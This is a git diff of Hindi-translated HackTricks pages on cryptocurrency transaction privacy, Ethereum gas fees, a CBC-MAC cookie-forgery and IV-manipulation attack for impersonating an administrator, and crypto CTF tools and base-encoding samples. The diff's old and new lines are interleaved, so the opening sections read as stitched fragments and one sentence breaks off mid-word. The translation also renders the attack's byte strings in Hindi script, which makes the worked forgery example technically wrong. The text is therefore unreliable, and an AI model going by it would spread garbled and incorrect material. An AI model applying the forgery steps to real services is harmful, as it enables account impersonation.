**किसी को एक से अधिक ऑन-चेन लेन-देन के माध्यम से भुगतान करना राशि-आधारित गोपनीयता हमलों की शक्ति को बहुत कम कर सकता है जैसे कि राशि संबंध और गोल नंबर**। उदाहरण के लिए, यदि उपयोगकर्ता किसी को 5 BTC भुगतान करना चाहता है और उन्हें चाहिए कि 5 BTC मूल्य आसानी से खोजा न जा सके, तो वे 2 BTC और 3 BTC के मूल्य के लिए दो लेन-देन भेज सकते हैं जो मिलाकर 5 BTC के बराबर होते हैं।
|
||||
गोपनीयता की रक्षा के लिए, प्रत्येक लेन-देन के लिए एक नया पता उपयोग करना महत्वपूर्ण है। पते का पुनः उपयोग गोपनीयता को खतरे में डाल सकता है क्योंकि लेन-देनों को एक ही एकता से जोड़ सकता है। आधुनिक वॉलेट अपने डिज़ाइन के माध्यम से पते का पुनः उपयोग निषेध करते हैं।
|
||||
|
||||
## बदला टालना
|
||||
## **लेन-देन गोपनीयता के लिए रणनीतियाँ**
|
||||
|
||||
बदला टालना एक ऐसी स्थिति है जहाँ लेन-देन के इनपुट और आउटपुट को ध्यान से चुना जाता है ताकि किसी भी बदला आउटपुट की आवश्यकता न हो। **किसी भी बदला आउटपुट का न होना गोपनीयता के लिए उत्कृष्ट है**, क्योंकि यह बदला पता लगाने के नियमों को तोड़ता है।
|
||||
- **एकाधिक लेन-देन**: एक भुगतान को कई लेन-देनों में विभाजित करना लेन-देन राशि को अस्पष्ट कर सकता है, गोपनीयता हमलों को नाकाम बना सकता है।
|
||||
- **बदलाव टालना**: बदलाव की आवश्यकता न होने पर लेन-देन के लिए विकल्प चुनना गोपनीयता को बढ़ावा देता है जिससे बदलाव की पहचान की विधियों को विघटित किया जा सकता है।
|
||||
- **एकाधिक बदलाव आउटपुट्स**: यदि बदलाव टालना संभव नहीं है, तो एकाधिक बदलाव आउटपुट्स उत्पन्न करना भी गोपनीयता में सुधार कर सकता है।
|
||||
|
||||
## एकाधिक बदला आउटपुट
|
||||
# **मोनेरो: एक गुप्तचरता का प्रकाश**
|
||||
|
||||
यदि बदला टालना एक विकल्प नहीं है तो **एक से अधिक बदला आउटपुट बनाने से गोपनीयता में सुधार हो सकता है**। यह भी बदला पता लगाने के नियमों को तोड़ता है जो सामान्यत: केवल एकल बदला आउटपुट होने का अनुमान करते हैं। जैसा कि यह विधि सामान्य से अधिक ब्लॉक स्थान का उपयोग करती है, बदला टालना अधिक अच्छा है।
|
||||
मोनेरो डिजिटल लेन-देनों में पूर्ण गुप्तचरता की आवश्यकता को संबोधित करता है, गोपनीयता के लिए एक उच्च मानक स्थापित करता है।
|
||||
|
||||
# मोनेरो
|
||||
# **इथेरियम: गैस और लेन-देन**
|
||||
|
||||
जब मोनेरो विकसित किया गया था, तो पूरी गोपनीयता की आवश्यकता थी जिसे यह हल करने का प्रयास किया गया था, और बड़े हिस्से में, यह उस शून्यता को भर दिया है।
|
||||
## **गैस को समझना**
|
||||
|
||||
# इथेरियम
|
||||
इथेरियम पर ऑपरेशन को कार्यान्वित करने के लिए आवश्यक गणना प्रयास को गैस मापता है, **ग्वेई** में मूल्यांकन किया जाता है। उदाहरण के लिए, 2,310,000 ग्वेई (या 0.00231 ईथ) का लेन-देन एक गैस सीमा और एक मूल शुल्क के साथ होता है, जिसमें खननकर्ताओं को प्रोत्साहित करने के लिए एक टिप शामिल है। उपयोगकर्ता अधिक शुल्क न देने के लिए एक अधिकतम शुल्क सेट कर सकते हैं, अतिरिक्त राशि को वापस कर देते हैं।
|
||||
|
||||
## गैस
|
||||
## **लेन-देन कार्यान्वयन**
|
||||
|
||||
गैस उनिट को सूचित करता है जो इथेरियम नेटवर्क पर विशेष ऑपरेशन को कार्यान्वित करने के लिए आवश्यक गणनात्मक प्रयास की मात्रा को मापता है। गैस इथेरियम पर एक लेन-देन सफलतापूर्वक करने के लिए आवश्यक शुल्क को सूचित करता है।
|
||||
इथेरियम में लेन-देन में एक भेजने वाला और एक प्राप्तकर्ता शामिल होते हैं, जो या तो उपयोगकर्ता हो सकते हैं या स्मार्ट कॉन्ट्रैक्ट पते हो सकते हैं। इन्हें एक शुल्क की आवश्यकता होती है और खनन किए जाने चाहिए। लेन-देन में महत्वपूर्ण जानकारी में प्राप्तकर्ता, भेजने वाले के हस्ताक्षर, मूल्य, वैकल्पिक डेटा, गैस सीमा, और शुल्क शामिल हैं। विशेष रूप से, भेजने वाले का पता हस्ताक्षर से निकाला जाता है, जिससे लेन-देन डेटा में इसकी आवश्यकता नहीं होती।
|
||||
|
||||
गैस मूल्य को **ग्वेई** में दर्शाया जाता है, जो खुद इथ का एक मापन है - प्रत्येक ग्वेई 0.000000001 इथ (10-9 इथ) के बराबर है। उदाहरण के लिए, यदि आपका गैस 0.000000001 इथ है, तो आप कह सकते हैं कि आपका गैस 1 ग्वेई का है। 'ग्वेई' शब्द खुद में 'गिगा-वेई' का अर्थ है, और यह 1,000,000,000 वेई के बराबर है। वेई खुद इथ की **सबसे छोटी इकाई** है।
|
||||
ये प्रथाएँ और तंत्र उन सभी लोगों के लिए मौलिक हैं जो क्रिप्टोकरेंसी के साथ संलग्न होने की दृष्टि से गोपनीयता और सुरक्षा को प्राथमिकता देते हैं।
|
||||
|
||||
एक लेन-देन की गैस की गणना करने के लिए इस उदाहरण को पढ़ें:
|
||||
## संदर्भ
|
||||
|
||||
मान लें कि जॉर्डन को टेलर को 1 इथ देना है। लेन-देन में गैस सीमा 21,000 इकाइयाँ हैं और बेस शुल्क 100 ग्वेई है। जॉर्डन ने 10 ग्वेई की टिप शामिल की है।
|
||||
|
||||
ऊपर दिए गए सूत्र का उपयोग करके हम इसे गणना कर सकते हैं `21,000 * (100 + 10) = 2,310,000 ग्वेई` या 0.00231 इथ।
|
||||
|
||||
जब जॉर्डन पैसे भेजता है, तो 1.00231 इथ जॉर्डन के खाते से कटा जाएगा। टेलर को 1.0000 इथ क्रेडिट किया जाएगा। खननकर्ता को 0.00021 इथ की टिप मिलेगी। 0.0021 इथ का बेस शुल्क जला दिया जाएगा।
|
||||
|
||||
इसके अतिरिक्त, जॉर्डन लेन-देन के लिए एक अधिकतम शुल्क (`maxFeePer
|
||||
* [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake)
|
||||
* [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/)
|
||||
* [https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions](https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions)
|
||||
* [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/)
|
||||
* [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/)
|
||||
* [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced\_address\_reuse)
|
||||
|
|
|
@ -1,29 +1,30 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** को PRs जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# CBC
|
||||
|
||||
यदि **कुकी** **केवल** **उपयोगकर्ता नाम** है (या कुकी का पहला हिस्सा उपयोगकर्ता नाम है) और आप उपयोगकर्ता "**व्यवस्थापक**" का अनुकरण करना चाहते हैं। तो, आप उपयोगकर्ता नाम **"बीडमिन"** बना सकते हैं और कुकी के **पहले बाइट** का **ब्रूटफोर्स** कर सकते हैं।
|
||||
अगर **कुकी** **केवल** **उपयोगकर्ता नाम** है (या कुकी का पहला हिस्सा उपयोगकर्ता नाम है) और आप उपयोगकर्ता "**एडमिन**" का अनुकरण करना चाहते हैं। तो, आप उपयोगकर्ता नाम **"बीडमिन"** बना सकते हैं और कुकी के **पहले बाइट** को **ब्रूटफोर्स** कर सकते हैं।
|
||||
|
||||
# CBC-MAC
|
||||
|
||||
रहस्यमयता में, एक **साइफर ब्लॉक चेनिंग संदेश प्रमाणीकरण कोड** (**CBC-MAC**) एक तकनीक है जिसका उपयोग एक ब्लॉक साइफर से संदेश प्रमाणीकरण कोड निर्मित करने के लिए किया जाता है। संदेश को कुछ ब्लॉक साइफर एल्गोरिदम के साथ सीबीसी मोड में एन्क्रिप्ट किया जाता है ताकि प्रत्येक ब्लॉक पिछले ब्लॉक के सही एन्क्रिप्शन पर निर्भर हो। यह आपसी आश्रितता सुनिश्चित करता है कि किसी भी प्लेनटेक्स्ट **बिट्स** में कोई **परिवर्तन** होने पर **अंतिम एन्क्रिप्टेड ब्लॉक** को एक ऐसे तरीके से **परिवर्तित** करेगा जिसे पूर्वानुमान या ब्लॉक साइफर कुंजी को नहीं जानकर नहीं रोका जा सकता।
|
||||
**साइफर ब्लॉक चेनिंग मैसेज ऑथेंटिकेशन कोड** (**CBC-MAC**) एक विधि है जो गुप्तशास्त्र में प्रयोग की जाती है। यह एक संदेश लेकर उसे ब्लॉक द्वारा एन्क्रिप्ट करने के द्वारा काम करता है, जहां प्रत्येक ब्लॉक की एन्क्रिप्शन पिछले ब्लॉक से जुड़ी होती है। यह प्रक्रिया एक **ब्लॉकों की श्रृंखला** बनाती है, जिससे सुनिश्चित होता है कि मूल संदेश के एक भी बिट को बदलने से एन्क्रिप्ट किए गए डेटा के अंतिम ब्लॉक में एक अप्रत्याशित परिवर्तन होगा। इस परिवर्तन को बनाने या उलटाने के लिए, एन्क्रिप्शन कुंजी की आवश्यकता होती है, जो सुरक्षा सुनिश्चित करता है।
|
||||
|
||||
संदेश m का CBC-MAC निर्धारित करने के लिए, किसी भी शून्य प्रारंभीक वेक्टर के साथ m को सीबीसी मोड में एन्क्रिप्ट किया जाता है और अंतिम ब्लॉक को रखा जाता है। निम्न चित्र में एक संदेश का CBC-MAC की गणना करने की रूपरेखा दी गई है![m\_{1}\\|m\_{2}\\|\cdots \\|m\_{x}](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) एक गुप्त कुंजी k और एक ब्लॉक साइफर E के साथ:
|
||||
संदेश m का CBC-MAC निर्धारित करने के लिए, किसी भी शून्य प्रारंभीक वेक्टर के साथ m को CBC मोड में एन्क्रिप्ट किया जाता है और अंतिम ब्लॉक को रखा जाता है। निम्न चित्र में एक गुप्त कुंजी k और एक ब्लॉक साइफर E का उपयोग करके संदेश का CBC-MAC की गणना की गई है![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5):
|
||||
|
||||
![CBC-MAC structure (en).svg](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png)
|
||||
![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png)
|
||||
|
||||
# सुरक्षा दोष
|
||||
|
||||
|
@ -38,44 +39,45 @@ CBC-MAC के साथ आम तौर पर **इस्तेमाल क
|
|||
* `E(m1 XOR 0) = s31 = s1`
|
||||
* `E(m2 XOR s1) = s32`
|
||||
|
||||
**जिसे एन्क्रिप्शन की कुंजी को नहीं जानते हुए गणना किया जा सकता है।**
|
||||
**जिसे एन्क्रिप्शन की कुंजी को नहीं जानते हुए भी गणना की जा सकती है।**
|
||||
|
||||
सोचिए आप **8 बाइट** ब्लॉक में नाम **प्रशासक** को एन्क्रिप्ट कर रहे हैं:
|
||||
सोचिए आप **8 बाइट** ब्लॉक में नाम **एडमिनिस्ट्रेटर** को एन्क्रिप्ट कर रहे हैं:
|
||||
|
||||
* `Administ`
|
||||
* `rator\00\00\00`
|
||||
* `एडमिनिस्ट`
|
||||
* `रेटर\00\00\00`
|
||||
|
||||
आप उपयोगकर्ता नाम **Administ** (m1) बना सकते हैं और हस्ताक्षर (s1) प्राप्त कर सकते हैं।\
|
||||
फिर, आप `rator\00\00\00 XOR s1` के परिणाम को उपयोगकर्ता नाम बना सकते हैं। यह `E(m2 XOR s1 XOR 0)` उत्पन्न करेगा जो s32 है।\
|
||||
अब, आप s32 का उपयोग **प्रशासक** के पूरे नाम के लिए हस्ताक्षर के रूप में कर सकते हैं।
|
||||
आप उपयोगकर्ता नाम **एडमिनिस्ट** (m1) का हस्ताक्षर (s1) प्राप्त कर सकते हैं।\
|
||||
फिर, आप `रेटर\00\00\00 XOR s1` का परिणाम वाला उपयोगकर्ता नाम बना सकते हैं। यह `E(m2 XOR s1 XOR 0)` उत्पन्न करेगा जो s32 है।\
|
||||
अब, आप s32 का उपयोग करके पूरे नाम **एडमिनिस्ट्रेटर** का हस्ताक्षर उपयोग कर सकते हैं।
|
||||
|
||||
### सारांश
|
||||
|
||||
1. उपयोगकर्ता नाम **Administ** (m1) का हस्ताक्षर प्राप्त करें जो s1 है
|
||||
2. उपयोगकर्ता नाम **rator\x00\x00\x00 XOR s1 XOR 0** का हस्ताक्षर प्राप्त करें जो s32 है**.**
|
||||
3. कुकी को s32 पर सेट करें और यह उपयोगकर्ता **प्रशासक** के लिए एक मान्य कुकी होगी।
|
||||
1. उपयोगकर्ता नाम **एडमिनिस्ट** (m1) का हस्ताक्षर प्राप्त करें जो s1 है
|
||||
2. उपयोगकर्ता नाम **रेटर\x00\x00\x00 XOR s1 XOR 0** का हस्ताक्षर प्राप्त करें जो s32 है**।**
|
||||
3. कुकी को s32 पर सेट करें और यह उपयोगकर्ता **एडमिनिस्ट्रेटर** के लिए एक मान्य कुकी होगी।
|
||||
|
||||
# हमला नियंत्रण IV
|
||||
|
||||
यदि आप उपयोग किए गए IV को नियंत्रित कर सकते हैं तो हमला बहुत आसान हो सकता है।\
|
||||
यदि कुकी केवल उपयोगकर्ता नाम एन्क्रिप्ट किया गया है, तो उपयोगकर्ता "**प्रशासक**" का उपयोगकर्ता बना सकते हैं और आप इसकी कुकी प्राप्त करेंगे।\
|
||||
अब, यदि आप IV को नियंत्रित कर सकते हैं, तो आप IV का पहला बाइट बदल सकते हैं ताकि **IV\[0] XOR "A" == IV'\[0] XOR "a"** और उपयोगकर्ता **प्रशासक** के लिए कुकी पुनः उत्पन्न कर सकते हैं। यह कुकी **प्रशासक** के उपयोगकर्ता का अनुकरण करने के लिए मान्य होगी।
|
||||
यदि कुकी केवल उपयोगकर्ता नाम एन्क्रिप्ट किया गया है, तो उपयोगकर्ता "**एडमिनिस्ट्रेटर**" का अनुकरण करने के लिए आप उपयोगकर्ता "**एडमिनिस्ट्रेटर**" बना सकते हैं और आप इसकी कुकी प्राप्त करेंगे।\
|
||||
अब, यदि आप IV को नियंत्रित कर सकते हैं, तो आप IV का पहला बाइट बदल सकते हैं ताकि **IV\[0] XOR "A" == IV'\[0] XOR "a"** और उपयोगकर्ता **एडमिनिस्ट्रेटर** के लिए कुकी पुनः उत्पन्न कर सकें। यह कुकी **उपयोगकर्ता एडमिनिस्ट्रेटर** का अनुकरण करने के लिए मान्य होगी।
|
||||
|
||||
# संदर्भ
|
||||
## संदर्भ
|
||||
|
||||
अधिक जानकारी [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** को PRs जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,18 +1,19 @@
|
|||
# क्रिप्टो सीटीएफएस ट्रिक्स
|
||||
# क्रिप्टो सीटीएफ़ ट्रिक्स
|
||||
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और प्रैक्टिस करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और प्रैक्टिस करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## ऑनलाइन हैश डेटाबेस
|
||||
|
||||
|
@ -28,16 +29,16 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
* [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5)
|
||||
* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html)
|
||||
|
||||
## जादू ऑटोसॉल्वर्स
|
||||
## मैजिक ऑटोसॉल्वर्स
|
||||
|
||||
* [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey)
|
||||
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (जादू मॉड्यूल)
|
||||
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (मैजिक मॉड्यूल)
|
||||
* [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
|
||||
* [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking)
|
||||
|
||||
## एन्कोडर्स
|
||||
|
||||
अधिकांश एन्कोडेड डेटा को इन 2 स्रोतों से डीकोड किया जा सकता है:
|
||||
अधिकांश एन्कोडेड डेटा को इन 2 स्रोतों से डिकोड किया जा सकता है:
|
||||
|
||||
* [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list)
|
||||
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
|
||||
|
@ -58,81 +59,34 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
### बेस एन्कोडिंग्स ऑटोसॉल्वर
|
||||
|
||||
इन सभी बेस को चेक करें: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
|
||||
|
||||
* **एस्की85**
|
||||
* `BQ%]q@psCd@rH0l`
|
||||
* **बेस26** \[_A-Z_]
|
||||
* `BQEKGAHRJKHQMVZGKUXNT`
|
||||
* **बेस32** \[_A-Z2-7=_]
|
||||
* `NBXWYYLDMFZGCY3PNRQQ====`
|
||||
* **Zबेस32** \[_ybndrfg8ejkmcpqxot1uwisza345h769_]
|
||||
* `pbzsaamdcf3gna5xptoo====`
|
||||
* **बेस32 जियोहैश** \[_0-9b-hjkmnp-z_]
|
||||
* `e1rqssc3d5t62svgejhh====`
|
||||
* **बेस32 क्रॉकफोर्ड** \[_0-9A-HJKMNP-TV-Z_]
|
||||
* `D1QPRRB3C5S62RVFDHGG====`
|
||||
* **बेस32 विस्तारित हेक्साडेसिमल** \[_0-9A-V_]
|
||||
* `D1NMOOB3C5P62ORFDHGG====`
|
||||
* **बेस45** \[_0-9A-Z $%\*+-./:_]
|
||||
* `59DPVDGPCVKEUPCPVD`
|
||||
* **बेस58 (बिटकॉइन)** \[_1-9A-HJ-NP-Za-km-z_]
|
||||
* `2yJiRg5BF9gmsU6AC`
|
||||
* **बेस58 (फ्लिकर)** \[_1-9a-km-zA-HJ-NP-Z_]
|
||||
* `2YiHqF5bf9FLSt6ac`
|
||||
* **बेस58 (रिप्पल)** \[_rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz_]
|
||||
* `pyJ5RgnBE9gm17awU`
|
||||
* **बेस62** \[_0-9A-Za-z_]
|
||||
* `g2AextRZpBKRBzQ9`
|
||||
* **बेस64** \[_A-Za-z0-9+/=_]
|
||||
* `aG9sYWNhcmFjb2xh`
|
||||
* **बेस67** \[_A-Za-z0-9-_.!\~\_]
|
||||
* `NI9JKX0cSUdqhr!p`
|
||||
* **बेस85 (एस्की85)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
|
||||
* `BQ%]q@psCd@rH0l`
|
||||
* **बेस85 (एडोबी)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
|
||||
* `<~BQ%]q@psCd@rH0l~>`
|
||||
* **बेस85 (IPv6 या RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_]
|
||||
* `Xm4y`V\_|Y(V{dF>\`
|
||||
* **बेस85 (xbtoa)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
|
||||
* `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d`
|
||||
* **बेस85 (XML)** \[_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\__]
|
||||
* `Xm4y|V{~Y+V}dF?`
|
||||
* **बेस91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_]
|
||||
* `frDg[*jNN!7&BQM`
|
||||
* **बेस100** \[]
|
||||
* `👟👦👣👘👚👘👩👘👚👦👣👘`
|
||||
* **बेस122** \[]
|
||||
* `4F ˂r0Xmvc`
|
||||
* **एटम-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_]
|
||||
* `MIc3KiXa+Ihz+lrXMIc3KbCC`
|
||||
* **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_]
|
||||
* **हैज़15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_]
|
||||
* `DmPsv8J7qrlKEoY7`
|
||||
* **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_]
|
||||
* **मेगान35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_]
|
||||
* `kLD8iwKsigSalLJ5`
|
||||
* **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_]
|
||||
* **जॉंग22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_]
|
||||
* `ayRiIo1gpO+uUc7g`
|
||||
* **ESAB46** \[]
|
||||
* **एसएबी46** \[]
|
||||
* `3sHcL2NR8WrT7mhR`
|
||||
* **MEGAN45** \[]
|
||||
* **मेगान45** \[]
|
||||
